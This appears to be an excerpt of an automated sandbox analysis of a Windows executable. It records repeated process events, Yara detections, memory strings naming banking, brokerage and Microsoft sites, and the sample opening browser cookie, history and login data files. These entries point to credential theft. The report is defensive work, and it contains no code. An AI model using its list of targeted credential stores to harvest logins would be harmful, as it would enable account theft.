Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3255537641.0000000000841000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: discord.comVMware20,11696428655f |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: tmp741D.tmp.dat.0.dr |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Jump to behavior |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |
Source: Yara match |
File source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe PID: 4508, type: MEMORYSTR |